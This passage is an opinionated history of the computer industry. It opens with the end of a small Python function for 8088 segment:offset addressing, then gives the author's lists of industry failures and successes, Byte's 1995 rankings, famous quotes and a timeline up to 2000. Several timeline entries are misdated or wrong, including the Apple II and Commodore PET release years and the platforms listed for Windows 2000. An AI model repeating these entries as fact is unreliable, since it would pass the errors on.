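    # 8088 real mode: shift the 16-bit segment left by 4 bits, add the
    # 16-bit offset, and wrap to the 20-bit address bus.
    return ((segment << 4) + offset) & 0xFFFFF

print(hex(physical_address(0x1234, 0x0010)))  # 0x12350
print(hex(physical_address(0x1200, 0x0350)))  # 0x12350 again: aliasing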

3. Alpha processor, which was DEC's attack on the processor market. It had blistering performance, which blew every other processor out of the water (and still does). It was never properly exploited, as there was a lack of development tools for it. The Intel Pentium proved that it was a great all-rounder which did many things well, and Intel were willing to improve the bits that it was not so good at.

4. Z8000 processor, which was a classic case of being technically superior, but was not compatible with its father, the mighty Z80, and its kissing cousin, the 8080. Few companies have given away such an advantage with a single product. Where are Zilog now? Head buried in the sand, probably.

5. DEC, who were one of the most innovative companies in the computer industry. They developed a completely new market niche with their minicomputers, but they refused to accept, until it was too late, that the microcomputer would have an impact on the computer market. DEC went from a company that made a profit of $1.31 billion in 1988, to a company which, in one quarter of 1992, lost $2 billion. Their founder, Ken Olsen, eventually left the company in 1992, and his successor brought sweeping changes. Eventually, though, in 1998, it was one of the new PC companies, Compaq, who would buy DEC. For Compaq, DEC seemed a good match, as DEC had never really created much of a market for PCs, and had concentrated on high-end products, such as Alpha-based workstations and network servers.

6. Fairchild Semiconductor. Few companies have ever generated so many ideas and incubated so many innovative companies, and got little in return.

7. Xerox. Many of the ideas in modern computing, such as GUIs and networking, were initiated at Xerox's research facility. Unfortunately, Xerox lacked the drive to develop them into products, maybe because they threatened Xerox's main market, which was, and still is, very much based on paper.

8. PCjr, which was another case of incompatibility. IBM lost a whole year in releasing the PCjr, and lost a lot of credibility with their suppliers (many of whom were left with unsold systems) and their competitors (who were given a whole year to catch-up with IBM).

9. OS/2, IBM's attempt to regain the operating system market from Microsoft. It was a compromised operating system, and its development team lacked the freedom and independence that the original Boca Raton IBM PC development team had. Too many people and too many committees were involved in its development. IBM's mainframe divisions were, at the time, a powerful force within IBM, and could easily stall, or veto, a product if it had an effect on their own profitable markets.

10. CP/M, which many believed would become the standard operating system for microcomputers. Digital Research had an excellent opportunity to make it the standard operating system for the PC, but Microsoft overcame them by making their DOS system much cheaper.

11. MCA, which was the architecture that IBM tried to move the market with. It failed because Compaq, and several others, went against it, and kept developing the existing architecture.

12. RISC processors, which were seen as the answer to increased computing power. As Intel has shown, one of the best ways to increase computing speed is to simply ramp up the clock speed, and make the buses faster.

13. Sinclair Research, who after the success of the ZX81 and the Spectrum, threw it all away by releasing a whole range of under-achievers, such as the QL, and the C-5.

14. MSX, which was meant to be the technology that would standardize computer software on PCs. Unfortunately, it hadn’t heard of the new 16-bit processors, and most of all, the IBM PC.

15. Lotus Development, who totally misjudged the market by not initially developing their Lotus 1-2-3 spreadsheet for Microsoft Windows. They instead developed it for OS/2, and eventually lost the market leadership to Microsoft Excel. Lotus also missed an excellent opportunity to purchase a large part of Microsoft when Microsoft was still a small company. The profits on that purchase would have been gigantic.

Here are my Top 15 successes in the computer industry:

1.    IBM PC (for most), which was a triumph of design and creativity. One of the few computer systems ever to be released on time, within budget, and within specification. Bill Gates must take some credit in getting IBM to adopt the 8088 processor, rather than the 8080. After its success, every man and his dog had a say in what went into it. The rise of the bland IBM PC was a great success of an open system over closed systems. Companies who have quasi-monopolies are keen on keeping their systems closed, while companies competing against them prefer open systems. The market, and thus the user, prefers open systems.

2.    TCP/IP, which is the standard protocol used by computers communicating over the Internet. It has been designed to be computer independent, so that any type of computer can talk to any other type. It has withstood the growth of the Internet with great success. Its only problem is that we are now running out of IP addresses to grant to all the computers that connect to the Internet. It is thus a victim of its own success.

3.    Electronic mail, which has taken the paperless office one step nearer. Many mourned the death of letter writing; before email, TV and the telephone had suppressed the art of letter writing, but with email it is back again, stronger than ever. It is not without its faults, though. Many people have sent emails in anger, or ignorance, and then regretted them later. It is just too quick, and does not allow for a cooling-off period. My motto is: 'If you're annoyed about something, sleep on it, and send the email in the morning'. Also, because email is not face-to-face or voice-to-voice communication, it is easy to take something out of context. So another motto is: 'Carefully read everything that you have written, and make sure there is nothing that can be taken the wrong way'. Only on the Internet could email addresses have become accepted, world-wide, in such a short time.

4.    Microsoft, who made sure that they could not lose in the growth of the PC, by teaming up with the main computer manufacturers, such as IBM (for DOS and OS/2) and Apple (for Macintosh application software), while developing their own operating system: Windows. Luckily for them, it was their own operating system which became the industry standard. With the might of having the industry-standard operating system, they captured a large market for industry-standard application programs, such as Word and Excel.

5.    Intel, who were gifted an enormous market with the development of the IBM PC, and have since invested money in enhancing their processors, while still keeping compatibility with the earlier ones. This has caused a great deal of hassle for software developers, but is a dream for users. With processors, the larger the market you have, the more money you can invest in new ones, which leads to a larger market, and so on. Unfortunately, the problem with this is that other processor companies can simply copy their designs, and change them a little so that they are still compatible. This is something that Intel have fought against, and, in most cases, have succeeded in regaining their market share, either with improved technology or through legal action. The Pentium processor was a great success, as it was technologically superior to many other processors in the market, even the enhanced RISC devices. It has since become faster and faster.

6.    6502 and Z80 processors, the classic 8-bit processors which became a standard part of most of the PCs available before the IBM PC. The 6502 competed against the Motorola 6800, while the Z80 competed directly with the Intel 8080.

7.    Apple II, which brought computing into the class room, the laboratory, and, even, the home.

8.    Ethernet, which has become the standard networking technology. It is not the best networking technology, but has survived because of its upgradeability, its ease of use, and its cheapness. Ethernet does not cope well with high-capacity network traffic. This is because it is based on contention, where nodes must contend with each other to get access to a network segment. If two nodes try to get access at the same time, a collision results, and no data is transmitted. Thus the more traffic there is on the network, the more collisions there are, which reduces the overall network capacity. However, Ethernet had two more trump cards up its sleeve. When faced with network capacity problems, it increased its bit rate from the standard 10Mbps (10BASE) to 100Mbps (100BASE), giving ten times the capacity, which reduced the contention problems. For network backbones it also suffered because it could not transmit data fast enough, so it played its next card: 1000BASE, which increased the data rate to 1Gbps. Against this type of card player, no other networking technology had a chance.

9.    Web, which is often confused with the Internet, and is becoming the largest data infrastructure ever created. The Web is just one of the uses of the Internet (others include file transfer, remote login, electronic mail, and so on).

10.    Apple Macintosh, which was one of the few PC systems which competed with the IBM PC. It succeeded mainly because of its excellent operating system (MAC OS), which was approximately 10 years ahead of its time. Possibly, if Apple had spent as much time developing application software as they did their operating system, it would have considerably helped the adoption of the Mac. Apple refusing to license MAC OS to other manufacturers also held its adoption back. For a long time it thus stayed a closed system.

11.    Compaq DeskPro 386. Against all the odds, Compaq stole the IBM PC standard from the creators, who had tried to lead the rest of the industry up a dark alley, with MCA.

12.    Sun SPARC, which succeeded against the growth of the IBM PC because of its excellent technology, its reliable Unix operating system, and its graphical user interface (X-Windows). Sun did not make the mistakes that Apple made, and allowed other companies to license their technology. They also supported open systems in terms of both hardware and software.

13.    Commodore, who bravely fought on against the IBM PC. They released many great computers, such as the Vic range and the Amiga, and Commodore was responsible for forcing down the price of computers.

14.    Sinclair, who, more than any other company, made computing acceptable to the masses. Okay, most of their machines had terrible membrane keyboards, and memory adaptors that wobbled, and it took three fingers to get the required command (Shift-2nd Function-Alt-etc), and it required a cassette recorder to load programs, and it would typically crash after you had entered one thousand lines of code. But, all of this aside, in the Sinclair Spectrum they found the right computer, for the right time, at the right price. Sometimes success can breed complacency, and so it turned out with the Sinclair QL and the Sinclair C-5 (the electric slipper).

15.    Compaq, for startling growth that is unlikely ever to be repeated: from zero to one billion dollars in five years. They achieved their growth, not by luck, but by sheer superior technology, and with the idea of sharing their developments.

So, apart from the IBM PC, what are the all-time best computers? A list by Byte in September 1995 stated the following:

1.       MITS Altair8800
2.       Apple II
3.       Commodore PET
4.       Radio Shack TRS-80
5.       Osborne 1 Portable
6.       Xerox Star
7.       IBM PC
8.       Compaq Portable
9.       Radio Shack TRS-80 Model 100
10.    Apple Macintosh
11.    IBM AT
12.    Commodore Amiga 1000
13.    Compaq Deskpro 386
14.    Apple Macintosh II
15.    NeXT NeXTstation
16.    NEC UltraLite
17.    Sun SparcStation 1
18.    IBM RS/6000
19.    Apple Power Macintosh
20.    IBM ThinkPad 701C

And the Top 20 computer people as:

1.    DAN BRICKLIN (VisiCalc)
2.    BILL GATES (Microsoft)
3.    STEVE JOBS (Apple)
4.    ROBERT NOYCE (Intel)
5.    DENNIS RITCHIE (C Programming)
6.    MARC ANDREESSEN (Netscape Communications)
7.    BILL ATKINSON  (Apple Mac GUI)
8.    TIM BERNERS-LEE (CERN)
9.    DOUG ENGELBART (Mouse/Windows/etc)
10.    GRACE MURRAY HOPPER (COBOL)
11.    PHILIPPE KAHN (Turbo Pascal)
12.    MITCH KAPOR (Lotus 123)
13.    DONALD KNUTH (TEX)
14.    THOMAS KURTZ (BASIC)
15.    DREW MAJOR (NetWare)
16.    ROBERT METCALFE (Ethernet)
17.    BJARNE STROUSTRUP (C++)
18.    JOHN WARNOCK (Adobe)
19.    NIKLAUS WIRTH (Pascal)
20.    STEVE WOZNIAK (Apple)

One of the classic comments of all time was by Ken Olsen at DEC, who stated, "There is no reason anyone would want a computer in their home." This seems farcical now, but at the time, in the 1970s, there were no CD-ROMs, no microwave ovens, no automated cash dispensers, and no Internet. Few people predicted these, so predicting the PC was also difficult. But the two best comments were:

“Computers in the future may weigh no more than 1.5 tons.” Popular Mechanics
“I think there is a world market for maybe five computers”, Thomas Watson, chairman of IBM, 1943

From John Napier to the Millennium Bug

Before the Internet really took off, here was my quick history of the computer:

1614    John Napier discovered logarithms, which allowed the simple calculation of complex multiplications, divisions, square roots and cube roots.
1642    Blaise Pascal built a mechanical adding machine.
1801    Joseph-Marie Jacquard developed an automatic loom controlled by punched cards.
1822    Charles Babbage designed his first mechanical computer, the first prototype for his difference engine. His model would be used in many future computer systems.
1880s    Hollerith produced a punch-card reader for the US Census.
1896    IBM founded (as the Tabulating Machine Company).
1906    Lee De Forest produces the first electronic valve.
1946    ENIAC built at the University of Pennsylvania.
1948    Manchester University produces the first computer to use a stored program (the Mark I).
1948    William Shockley (and others) invents the transistor.
1954    Texas Instruments produces a transistor using silicon (rather than germanium). IBM produces the IBM 650 which was, at the time, the workhorse of the computer industry. MIT produces the first transistorized computer: the TX-0.
1957    IBM develops the FORTRAN (FORmula TRANslation) programming language.
1958    Jack St. Clair Kilby proposes the integrated circuit.
1959    Fairchild Semiconductor produces the first commercial transistor using the planar process. IBM produces the transistorized IBM 7090.
1960    ALGOL introduced, which was the first structured, procedural language. LISP (LISt Processing) introduced for Artificial Intelligence applications.
1961    Fairchild Semiconductor produces the first commercial integrated circuit.
COBOL (COmmon Business-Oriented Language) developed by Grace Murray Hopper.
1963    DEC produce its first minicomputer.
1965    BASIC (Beginners All-purpose Symbolic Instruction Code) was developed at Dartmouth College. IBM produced the System/360, which used integrated circuits.
1968    Robert Noyce and Gordon Moore start-up the Intel Corporation.
1969    Intel began work on a device for Busicom, which would eventually become the first microprocessor.
1970    Xerox creates the Palo Alto Research Center (PARC), which would become one of the leading research centers of creative ideas in the computer industry. Intel releases the first RAM chip (the 1103), which had a memory capacity of 1Kb (1024 bits). DEC releases the 16-bit PDP-11 (PDP-11/20) computer, which would eventually sell over 600,000 units.
1971    Intel release the first microprocessor: the Intel 4004. Bill Gates and Paul Allen start work on a PDP-10 computer in their spare time. Ken Thompson, at Bell Laboratories, produces the first version of the UNIX operating system. Niklaus Wirth introduces the Pascal programming language.
1973    Xerox demonstrates a bit-mapped screen. IBM produces the first hard disk drive (an 8 inch diameter, and a storage of 70MB).
1974    Intel produces the 8-bit 8080 microprocessor. Bill Gates and Paul Allen start up a company named Traf-O-Data. Xerox demonstrates Ethernet. MITS produces a kit computer, based on the Intel 8080. Xerox demonstrates WYSIWYG (What You See Is What You Get). Motorola develops the 6800 microprocessor. Brian Kernighan and Dennis Ritchie produce the C programming language.
1975    MOS Technologies produces the 6502 microprocessor. Microsoft develops BASIC for the MITS computer.
1976    Zilog releases the Z80 processor. Digital Research copyrighted the CP/M operating system. Steve Wozniak and Steve Jobs develop the Apple I computer, and create the Apple Corporation. Texas Instruments produces the first 16-bit microprocessor: the TMS9900. Cray-1 supercomputer released, the first commercial supercomputer (150 million floating point operations per second).
1977    FORTRAN 77 introduced. DEC released their new 32-bit VAX computer range (VAX-11/780).
1978    Commodore released the Commodore PET. DEC release VMS Version 1.0 for their VAX range.
1979    Intel releases the 8086/8088 microprocessors. Zilog introduces the Z8000 microprocessor and Motorola releases the 68000 microprocessor. Apple introduces the Apple II computer, and Radio Shack releases the TRS-80 computer. VisiCalc and WordStar introduced.
1981    IBM releases the IBM PC, which is available with MS-DOS supplied by Microsoft and PC-DOS (IBM’s version).
1982    Compaq Corporation founded. Commodore releases the Vic-20 computer and the Commodore 64. Sinclair releases the ZX81 computer and the Sinclair Spectrum. TCP/IP communications protocol created. Intel releases the 80286, which is an improved 8086 processor.
WordPerfect 1.0 released.
1983    Compaq releases their first portable PC. Lotus 1-2-3 and WordPerfect released. Bjarne Stroustrup defines the C++ programming language. MS-DOS 2.0 and PC-DOS 2.0 released.
1984    Apple releases the Macintosh computer. MIT introduces the X-Windows user interface.
1985    Microsoft releases the first version of Microsoft Windows, and Intel releases the classic 80386 microprocessor. Adobe Systems define the PostScript standard, which is used with the Apple LaserWriter. Philips and Sony introduce the CD-ROM. DEC releases the MicroVAX II.
1986    Microsoft releases MS-DOS 3.0. Compaq release the Deskpro 386.
1987    Microsoft releases the second version of Microsoft Windows. IBM releases PS/2 range. Model 30 uses 8088 processor, Model 50 and Model 60 use 80286, and Model 80 uses 80386 processor. VGA standard also introduced. IBM and Microsoft release the first version of OS/2.
1988    MS-DOS 4.0 released.
1989    WWW (World Wide Web) created by Tim Berners-Lee at CERN, the European Particle Physics Laboratory in Switzerland. Intel develops the 80486 processor. Creative Laboratories release the Sound Blaster card.
1990    Microsoft releases Microsoft Windows 3.0. DEC releases the last two members of its PDP family (MicroPDP-11/93 and PDP-11/94), after 20 years of sales.
1991    MS-DOS 5.0 released. Collaboration between IBM and Microsoft on DOS finishes.
1993    Intel introduces the Pentium processor (60MHz). Microsoft release Windows NT, Office 4.0 (Word 6.0, Excel 5.0 and PowerPoint 4.0) and MS-DOS 6.0 (which includes DoubleSpace, a disk compression program). IBM makes an annual loss of $8 billion.
1994    Netscape 1.0 released. Microsoft withdraws DoubleSpace in favor of DriveSpace (because of successful legal action by Stac, which claimed that parts of it were copied from its program: Stacker). MS-DOS 6.22 would be the final version of DOS.
1995    Microsoft release Windows 95 and Office 95. Intel releases the Pentium Pro, which has speeds of 150, 166, 180 and 200MHz (400MIPs). JavaScript developed by Netscape. IBM purchase Lotus Development Corp.
1996    Netscape Navigator 2.0 released (the first to support Java Script). Microsoft releases Windows 95 OSR 2.0, which fixed the bugs in the first release and adds USB and FAT 32 support.
1997    Intel releases the Pentium MMX. Microsoft releases Office 97, which creates a virtual monopoly in office application software for Microsoft. Office 97 is fully integrated and has enhanced versions of Microsoft Word (upgraded from Word 6.0), Microsoft Excel (upgraded from Excel 5.0), Microsoft Access, Microsoft PowerPoint and Microsoft Outlook. IBM's Deep Blue beats Garry Kasparov (the World Chess Champion) in a chess match. Intel releases the Pentium II processor (233, 266 and 300MHz versions). Apple admits serious financial trouble. Microsoft purchases 100,000 non-voting shares for $150 million. One of the conditions is that Apple drops their long-running court case with Microsoft for copying the Mac interface in Microsoft Windows (although Apple copied its interface from Xerox). Bill Gates' fortune reaches $40 billion. He has thus, since 1975 (the year that Microsoft was founded), earned $500,000 per hour (assuming that he worked a 14-hour day), or $150 per second.
1998    Microsoft releases Microsoft Windows 98. Legal problems arise for Microsoft, especially as its new operating system includes several free programs as standard. The biggest problem is with Microsoft Internet Explorer, which is free, compared with Netscape, which must be purchased.
1999    Linux Kernel 2.2.0 released, and heralded as the only real contender to Microsoft in the PC operating system market. Intel releases the Pentium III (basically a faster version of the Pentium II). Microsoft Office 2000 released. Bill Gates' wealth reaches $100 billion (in fact, $108 billion in September 1999).
2000     Millennium bug bites with false teeth.
and on    Microsoft releases Windows 2000 (NT Version 5) in three versions: Workstation, Server and SMP Server (multiprocessor). It runs on DEC Alphas, Intel x86, Intel IA32, Intel IA64 and AMD K7 (which is similar to an Alpha). Microsoft releases Office 2000, but loses its court case.